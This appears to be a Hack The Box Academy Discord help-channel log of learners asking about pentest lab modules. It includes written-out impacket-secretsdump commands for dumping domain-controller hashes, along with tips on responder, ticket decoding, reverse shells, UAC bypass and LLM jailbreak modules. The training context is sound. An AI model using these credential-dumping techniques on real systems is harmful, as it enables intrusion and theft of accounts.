$ impacket-secretsdump -k -no-pass -dc-ip 10.129.234.109 -just-dc-user Administrator 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL


[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] 'NoneType' object has no attribute 'getRemoteHost'
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up... 

When i use the -use-vss flag (as the output is saying) i recieve this error:

$ impacket-secretsdump -k -no-pass -dc-ip 10.129.234.109 -use-vss 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL


[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Cleaning up... 

I abused of the NTLM RELAY attack and now i need to dump the hashes but i'm having this error

thank you in advance.

Check you have a valid Kerberos ticket (since you used -k).

usally you have to split ut 'domain'/'account'@host but when secretsdump suggest -use-vss or other flags there is usally some underlying problem use -debug aswell

https://github.com/fortra/impacket/issues/1251 here is the answer why -vss flag dosent work

Guys, what should I have to apply to pentester??

I am doing Pro lab solar htb, i have an issue with jail escape after accessing jupiter.solarsystem.htb machine. Any help?

Best to ask in #1263635449335910531

If you have no access, read and follow #welcome

It has nothing to do with the Academy modules, but just read the job ads in your area and see what requirements need to be met.
I advise you to read and follow #welcome so that you can access better channels.

Hello, guys. Where i can find correct wordlist for this module/section?
https://academy.hackthebox.com/module/144/section/1257
I used subdomains-top1million-110000.txt but it found all subdomains except su

Hello, in the Skill Assessment of the Password Attack module I tried to set up ligolo for pivoting but i'm new to this and there is a weird behaviour I cannot say if it comes from me or not. When the session is started in ligolo I can ping DC01 in the internal network corresponding to: 172.16.119.11 but I can't ping FILE01 and JUMP01. Do you have any idea how this is possible ? Wrong set up from me ? Or it's definitly weird and I should reset the machine? (I did this yesterday and it worked totally,)

It should be in there actually, are you sure you're brute forcing correctly?

@neon tinsel I just need the command you used, not the results, as those are spoilers

oh, sorry.
gobuster vhost -u url_here -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain --threads 100

ok that's interesting, can you DM me with the full output of that command?

H

Anyone available for discussion regarding "Attacking Common Applications - Skills Assessment II"

Hi
First You need to gai foothold in dmz01 install the agent, Start tunell in ligolo ans then You ar able to ping jump01 and dc

After connecting do you have the route set? Do you have the ips and hostnames in your /etc/hosts file? Also not all devices may respond to pings

running an nmap -Pn scan may reveal info to ensure that the internal targets are operating properly

Windows targets, generally, dont respond to pings

hi guys

So I got the foothold on dmz01, I'm able to ping DC01, but not the others, I have not changed the /etc/hosts since i'm workinng with ips (Tell me if i'm wrong). I tought maybe jump01 and file01 blocked pings ? It seems nmap work fine in fact :))

do u guys have tool for the hackthebox

As i said a moment ago: not all devices may respond to pings :)

Thank you :))

Theres no one tool for hackthebox

is it only in resource links?

I suggest reading #welcome and #rules to see what the server is about @pastel ice

?

things where u can do cyber stuff

sorry kinda new to the environment

As i said, theres no one tool to rule them all. And this isnt #general

ok wait a bit

In order to gain access to chat there, youll need to link your hackthebox account to the discord server

ah oka thanks

Hi guys, I’m working on the web attack section of the web pentester path. In the bypassing basic authentication section of http verb tampering, it says we can use curl -i -X OPTIONS http://SERVER_IP:PORT/ to see which methods are allowed, but this actually does not show the options in practice as it does with the module. Is this on purpose or does my lab have some form of error ?

one last question pls

Hii i have like submitted 2-3 requests in this group but the thing is no mod or support member does even try to reply
Why we are having discord community when the mods can’t even help or try to reply
Tagging you cause I only saw you reply to others having problem

after pivoting to a machine with ligolo, is there a way to get the sudo responder -I <int-name> -A working from my host? seems like i HAVE to rely on the linux attack host that they provide to use responder

Not everything you see will be replicable

The best way to get website support is by contacting support via the website, not by asking in the discord.

Ok thanks. I was just wondering how I’d check on the exam

I cant tell you that info

Not without a lot of portforwarding shenanigans

Website support take 1-2 days to solve a single error that’s why I posted my queries here

Not that I want you to tell me, but if the method being thought is not working then I’m assuming they will teach other methods ?

Also you didnt say what your issue was. I get youre upset but depending on the issue not sure what can be done on this end

#modules message here it is please just nudge me

It just depends. It could be configured or it couldn't, consider everything taught to be possible on the exam and dont focus too hard on details like that

Ok thanks

Log off and log back on

Also: website support doesnt help with content problems if the issue is not technical (lab is broken/not spawning/etc)

This server is more focused on community help, not everyone has done the module you're on

Log off of the account, then log back onto the account after setting it

That's literally the solution to your problem

Closing the rdp session doesnt log you off btw

Also deleted the message because its a spoiler

Yes I got thanks but I’m just asking is it possible to bypass uac without logging of I’m trying various methods like DLL auto elevate to build my methodology

There are also some modules/section that no one will even touch again, let alone help someone with.

*ehem* thick clients *ehem*

No: because the relevant rights weren't set yet

Now I got it

You're asking for help with something thats out of scope for what's being asked of the module

Thank you @fathom pendant appreciated your help

I do hope you're doing AEN blind and not answering the questions and reading the module

As that will help strengthen and reinforce your methodology more

No I’m doing it blind and preparing pentest report so was trying various methods I learned within cpts path

I suggest first completing the attack chain [getting to the highest privelege in the domain] before going and trying different methods

Afterwards, the module basically becomes simple to read and go through and see what methods the author used instead

Getting hung up on one step before completing it is just going to be a detriment, especially in cases where you may actually be on a timed test

I’ll go with this approach now
Thank you and also thanks for suggesting something useful

No problem; its easy to get in the mindset of "how can I do this differently" but its also important to complete the objective first, then return. That way you dont get the other feeling of "oh god, I spent x hours on this, im cooked"

One last request just to be confident whenever I’ll complete my AEN pentest report can I dm you and send the report then you can give me feedback if possible?

No, thats actually against the rules. It was ruled so by the arbiters (staff)

In general; just stick as close to the sample report as possible and be consistent in your labeling

It used to be allowed, why they banned it is beyond me 😭 It's such a good way to know if you're on the right track for documentation since that module was so shite

Technically; sharing content above tier 0

but the template is public for the exam anyway on systreptor

speaking of sysreptor highly recommend also use a LOCAL INSTALL, there's been times when the site goes down and you don't want that to happen during the exam.

But still if someone can read and get me the genuine feedback would boost the confidence as I cannot just give myself the feedback you know what I’m saying it’s just slightly a benefit of doubt

I forget the bts convo where it was decided you can probably look at the chat in #lounge-staff or #moderation

You can maybe message support on the website to see, but thats as far as I know

You'll get pretty detailed feedback on the report anyways after your first attempt if you do fail. Which is why I highly recommend not submitting a blank report. Even if you know you'll fail (i.e. not enough flags) at least prepare your report to the best of your ability so that you can get good feedback.

Imo one of the more important things with AEN is solving where your weak points are

I can try for second attempt but I mentally prepared myself to get it achieve within the first attempt but yes let’s see how my report goes as if getting 12 flags but cannot output the desired report would also fail me 🥲

Hard truth is: you won't know until you try, yes doing AEN blind is a massive undergoing, and that alone deserves respect. But CPTS is MUCH HARDER than AEN. and unlike AEN, there is a very short time limit in respect to how long it actually is.

AND you dont have a convenient guide to cheat with

Why is that?

Because that section, or some sections, are just so hard, that even after doing them, and gaining deeperknowledge and skill in those areas, people won't be willing to provide help for it, at least not for free

Oh i understand, so you have the high tier ones in mind

Understandable

understand that module tier != module difficulty. There are some tier 4 modules I'd imagine would be quite easy

Hm i always used their set difficulty as an info source though id imagine some might be easier to handle, but im nowhere near them rn

module tier moreso relates to the required underlying knowledge more than difficulty

tier 0 -> you don't know shit
tier 1 -> you kinda know shit
tier 2 -> ok now you know a bit of something
tier 3 -> wtf it goes deeper?
tier 4 -> now you're just fucking with us

While it’s understandable that encountering issues with the cloud version during an exam is inconvenient, it’s important to view this in context. Over the past 90 days, we’ve maintained an uptime of 99.936% (see status.sysreptor.com), which translates to only a few hours of total downtime. Today’s interruption was caused by an incident at our server provider’s data center. unfortunate and naturally, it’s when people notice most and complain.

That said, I don’t fully agree with the suggestion to “highly recommend the local installation.” Running a local setup comes with its own significant overhead. keeping everything running smoothly, handling updates, handling the database, and preparing for unexpected failures. Users must also manage backups and test recovery procedures. We’ve seen many cases of users losing their encryption keys because they forgot to back them up, resulting in data loss. We receive a fair number of support requests about this though you don’t often see those issues here on Discord.

In the end, choosing cloud or local is a personal decision both have pros and cons 🙂

Lmaoo thats such a great explanation

this question is driving me crazy in the windows prisec module, how do i enumerate im allowed to run as administrator...

Please dont @ me directly. Im not staff nor am I required to actually respond. Also you gave not enough info to help you

ok sorry

i will take it to erratum

Erratum is for reporting module errors, not for asking for help

well i find it to be an error to not explain

Evil Twin Attack on WPA2
I'm completely stuck on this module. I have already recovered the handshake, but inside the module's VM there is no wordlist to crack the handshake and obtain the answer to the question: "Perform the evil twin attack as demonstrated in this section. What is the discovered value of the WPA PSK?"

Hello everyone. I am stuck with module "ATTACKING AI - APPLICATION AND SYSTEM", its about the 'Model Deployment Tampering' task. When I am trying to replicate the attack and execute the last curl cmd on the page, then I get error '{"code": 500, "type": "NullPointerException", "message": "Cannot invoke "java.util.Map.entrySet()" because "modelsInfo" is null"}'. Does anyone know how to fix it?

can someone help me in how do i get permission so i can taljk in general and the other chanels

Instructions are in #welcome

thank you so much

It sounds like you need to supply "modelsInfo" in your curl request, given the error

Is thre any methods to root xiaomi phones without bootloader access

for this taks i have to find what type of service the dconf service is. the only problem is i can't seem to find it and keep getting blank outputs. does anybody have an idea? also just searching for it using systemctl gives me no result. EDIT: found the file but it smeems to have an empty type. TYPE:

i don't recall if that one specifically has a target you can ssh into

it does not give a target ip and is a module you can finish on the HTB VM itself

it helps to know the module and section name btw

my bad, it is the Task Scheduling from the linux fundementals

you might need to dig into the systemd directories for dconf.service

Thank you, i found it. so it is not possible to find it via systemctl?

No, I think that the one running in systemctl is using a different config

okay got it. thanks a lot for the help

Hi Can you help me out the answer of the first question, i tried all the possible combination but it does not accept the hash. Have solved other task but this one is being a pain

dm me, I can help

Hello Everyone,
i was wondering if anyone could help me with „Terminate Pwnbox to switch location“.
I googled and watched youtube videos, also read the help to Pwnbox, but the button mentioned there is nowhere to be found on my page.
My location is set to UK, but i need it to be DE since im from Germany.
Also, if i press „Start Instance“, there is a popup in the upper right corner of my screen which says „There are no available instances. Please try later“

same problem im having

+1

Reach out to website support

https://status.hackthebox.com

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

+1

@swift dove thank you for recommending Google Colab, especially in trojan attacks section in AI Data Attacks, helps a lot

seems very much like an issue on the entire platform? having this for a few hours now

New here! Does anyone know how to obtain more Pwnbox instance spawns? I didn't see anywhere to "purchase" more spawns?

you can't purchase instance spawns; on academy if you've spent any amount of money you get infinite. on the main platform having more pwnbox time is directly tied to having a subscription

Ok! Thank you! 🙂

but it appears plenty of people having spawn issues with the pwnbox, could be an upstream issue with their provider

good evening everyone, about AI red teamer: LLM output attack: Function calling 3, could any one drop some hint for this? e.g., is it SQL injection or? Totally clueless for this one -3-

Howcome i cant talk in general

You didn't link your HTB account

Make sure to read the #rules and then #welcome which shows you how to link it

Ohh luv bro

I jus wanna ask questions im stuck lol

Hello, can anyone help me on server side attacks skills assessment?

you can dm me

How come grep prints some lines starting with random numbers (red) but when I pipe it into sort it removes the random numbers?

Linux foundations module

Last screenshot was grep with -o, heres the output for normal

Its likely something to do with terminal printing progress, try with -s

Yeah its progress printing shenanigans see the 100 22266 lines and it matches similarly to the progress output

Yess that was the issue, thank you

I just spotted the pattern

I cant use rdp with proxychains in the password attacks skills assesment, could someone help me

ligolo-ng avoids the need for proxychains; but errors tend to help more. did you try running proxychains with sudo?

@strong vector

i changed to socks 4 and it worked

thx

U welcome

anyone able to help with this?

Most welcome ! 🙏

Hi - I have completed the AI Red Teaming Track and am left with 9 flags overall. If someone who can help pls ping me so I can connect for any hints to complete the track

hey, im 2 days deep in the password attacks skills assesment and i dont have enough money to continue my academy subscription so i can't waste any more time, if someone could dm me to help i would be gratefull ^^ (i rlly need help )

I have finished the Advanced Deserialization attack. I don't see where can I review/feedback to the module, so I think I will write it here.

I hope this module should add more content to it such as reproduce custom gadget in old CVE and sharing the road to it as the same approach in the module. As my point of view, it's not "advanced" too much as the title (the current content).

Anyway, the module provides additional idea, how to approach the issue and more deep understanding the well-known gadget. It will be helpful if you doesn't work with this kind of vuln before.

In the module: Command Injections, section: Advanced Command Obfuscation, subsection: Reversed Commands there is a tip given:

Tip: If you wanted to bypass a character filter with the above method, you'd have to reverse them as well, or include them when reversing the original command.

I want to know how would this work against the character semi-colon ( ; ). Thanks!

hola

hey can I DM you for the SA, I'm stuck here and I need a nudge

Okay sure, you can dm me

hello guys, i am doing web proxies module in that zap scanner and i got stuck like how we can get the flag like i got 1 dir called devtools there is ping.php

can someone help me in this please

I cant recall but I'd probably go straight to check for command injection

ok brother

got it

thanks man

Modules: Password Attacks
Section: Network Services
Link: https://academy.hackthebox.com/module/147/section/1327

Hi guys, I am stucked on the rdp part for few hours, where i tried bruteforcing with the username.list and password.list given, with -t 4, but it still not working, i did found some credentials but those are for winrm only, can someone provide some tips on that?

u can bruteforce smb first, and then use cracked credentials directly to rdp

Does anyone play dab

Steal a Brainrot

New HTB Academy design sucks and its too heavy on my old laptop.

That is my feedback

eiii, i cant do it jn

i think cuz i put /u: and /p: with space

ahhhhhhhh

thank you!

perhaps u need xfreerdp3 instead of xfreerdp, I also cant use it

Can anyone DM me?

for what?

yeah

Advanced SQL Injection module - The error for failed compilejava for fernflower. To fix this update to JDK 21 install rather than 17 mentioned in the module. 👍

is there a good stable reverse shell that isnt meterpreter? i still want to use multi/handler but entirely remove my usages of meterpreter

https://github.com/brightio/penelope

when you exports ticket with rubeus, how do you guys decode the base64

I tried using online decodeers and also linu cli but it outputs gibberish

Hello, is introduction to Python3 enough to write my own tools ?

echo -n '<base64 here>' | base64 -d > <ticket name.kirbi>

Well, a tool is a broad description, but for simple automation yes.

Should you expect to write something like netexec? probably not

Would it be enough to continue on CWEE path

Do you already have CWES?

general suggestion

as green is the "dopamine" button to pass next stage, I think submit should be green and show solution blue as I always accidentally click on show solution instead of submitting to continue

I’m learning it ATM but I was wondering if python3 is enough for CWEE after CWES ofc

I'm not too sure but I'm assuming it's just a bit of automation needed for CWEE.

It's not meant to be data you can read.

Should my knowledge in Python be beyond that module?

oh

Whatever's included in the path is all you need for said path. If it's all that's in CWEE for automation, then it's all you need

Okay thanks

You'd have to first convert it into a ccache file then you can check it using MIT KRB

https://notes.benheater.com/books/active-directory/page/kerberos-authentication-from-kali

I was hoping to get the ticket descriptions sort of how it is with mimikatz

As I said, you can convert it into a ccache file then check it using MIT KRB tools on linux.

Use: impacket-ticketConverter.py to convert the ticket and klist to check the ticket description

Read more in the article

There's also probably a way to pass it straight onto mimikatz but I prefer using remote tools on linux

Welp, a little google searching shows you can get the info straight from Rubeus

https://www.hackingarticles.in/a-detailed-guide-on-rubeus/

I'm having a little issue with an academy module.
In the Intro to Network Traffic Analysis, Networking Primer - Layers 5-7 I've answered all of the questions and I can't interact with the answers, but it won't let me mark it as complete. I've tried other browsers and incognito mode

Have you tried a full refresh? Ctrl+shift+R

CTRL+F5, no luck unfortunately

i need a help on NEW -module-Web Fuzzing-Validating Findings , after fuzzing target system using directory-list-2.3-medium.txt i find few directories i am afraid if im going on the right track .

Contact support

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

thank you

can someone help me with Attacking Thick Client Applications, Im not understanding how to complete this section of the Attacking Common Applications module

hahahaha

but you have to solve byyourself at the end

The proxy server is refusing connections. (non-VPN machine) Anyone else experiencing the same?

Check your web proxy, and maybe start burp or whatever web proxy you use

nice, forgot to turn it off yesterday bruh

@waxen totem may I DM you regarding a module? Thanks.

https://dontasktoask.com

You don't have to ask about a module in DMs

In the module: Command Injections, section: Advanced Command Obfuscation, subsection: Reversed Commands there is a tip given:

Tip: If you wanted to bypass a character filter with the above method, you'd have to reverse them as well, or include them when reversing the original command.

I want to know how would this work against the character semi-colon ( ; ). Thanks!

ngl no clue, the most command obfuscation I ever needed was to use base64 encoding

I put links as answer and for some reason it isnt correct

Funny since you mentioned that, the question section in the same section also only solves by that technique. The other techniques don't work, however they tell us to use one of the techniques learned in the section.

Try all the techniques, which-ever sticks, sticks

so anyone gonna help me with my question, cuz for some reason "links" isnt correct

even tho thats the correct answer

which module and section is this from?

introduction to networking

from network foundations

Hello everyone!

I'm stuck on a question from the "Introduction to Command Line" module in the "Managing Services" section, and I have used the two possible answers so far.

The question is: What command string will stop a service named 'red-light'? (full command as the answer).

I answered sc stop 'red-light' and it's marked as incorrect. Then I tried the command Stop-Service -Name 'red-light' and it's also being marked as incorrect.

I need your guidance.

Hi everyone, the File Transfer module is more indicated for exploitation phase or post-exploitation phase?

nvm Ill watch a youtube video

Looks like that's the correct answer, maybe check for leading/trailing spaces and try different capitalization forms

?

I'd say post-exploitation, because you usually only ever transfer files if you already have a foothold

In the penetration tester path this module appears after the Vulnerability Assessment

They never said that the modules were in the order of the process

they have called it "path"

Active Directory Enumeration and Attacks is before Web Attacks but more likely than not you'll have access to Web first if it's a fully external test

because they put it in the order they think is best to learn, not in the order in which it's actually done.

got it

Guys

And I also tried with net stop and nothing

Remove the single quotes from your first answer and then try.

Thanks a lot.

In cmd, you should use double quotes " instead of single quotes when your service name (or any argument) contains special characters or spaces. Single quotes ' don’t work the same way they do in Linux shells like Bash.

However, if you’re in PowerShell, both quotes work fine.

I see

i'm going to write that down

Hi new here

You need credentials for that one

Oh, I have the creds, but I just can't seem to be able to actually use the exploit within msfconsole 🙁

Hmm ... did you set the vhost ?

and the rhosts

Ohh ... Actually you can't "use" the module itself. My bad
You need to reload_all in msfconsole - to reload all modules

Or as an alternative, you can specify the folder (I believe it's saved somewhere on the box itself - or maybe you have it in your kali) with -m /home/FolderPath and then search with the filename

Ahh, okay sweet. Thanks!

😉

module is above tier 0 also don't share info about skill assessments @scenic arrow

Apologies! Will know for next time.

Try OneShot

YOu still need help with this one ?

I finished today, you still need help ?

Hey guys, trying myself with module getting started n having some troubles with Public Exploits, mb someone could help me with understanding of finding services?

You're over thinking it, youre given a public ip and a port. That is the only port you need to concern yourself with

okay, ty

Anyone up for a quick question on ai evasion - foundation?

Hi, stuck at bopla / mass assignment one in api attacks, I can create order but I get error when creating items, and really can't figure what's wrong here?.

Make sure you're populating the right OrderID and ProductID, the OrderID is the ID of the order that you created (obviously) and the ProductID has to correspond to the correct product in /api/v1/products

Guys, how to learn unethical hacking?

Blackhat hacking*

I think you're on the wrong server. Please read #rules.

Hi guys. I'm currently doing the malicious document analysis and i'm currently at the analysis of XLL Add-ins. After 6 hrs i somehow managed to get the bin file but when i try to run speakeasy i keep getting the "invalid instructions" error. I've tried speakeasy with different options but i still get the same error. Can somebody help pls?

If anyone is free I could use a nudge on Attacking Common Services SMTP, I've been trying to get q2 for a few hours, and with a lot of experimentation, I still don't have the creds for the found user.

Adjust the wait time

that did it thanks!

@drifting hazel thats illegal, and we dont do that here

Has anyone complete the "Jailbreaks II" module in "Prompt Injection Attacks" module? I have tried everything in the module, read the papers it references and tried a few things from there as well. Any help would be appreciated.

Module name: Attacking common services. When we enumerate users on SMTP or POP3 with the USER command or VRFY, does a returned name like john refer to an email address for that domain or OS level account?

It refers to name registered in the email, such as john@domain

SMTP/POP3/IMAP are all mail protocols, so i wouldn't make broad assumption that its an OS level account when the account could just be somewhere in the system

Its hard to make sweeping generalizations as well

Okay, so it refers to an email account for that domain. I was confused because in the module they brute force the POP3 service using just john instead of john@domain.com

That could be how its set up on that service, and the @domain could be appended on the backend portion instead of being required on the front

Can anyone help me out a but, right now I am own my penetration tester path but In the module of pivoting and tunneling, I am sending one dll file for socks over rdp but it's gettting deleted by AV even the thing is mentioned in the module course, but machine is deleting it, and I am not able to solve the challenge.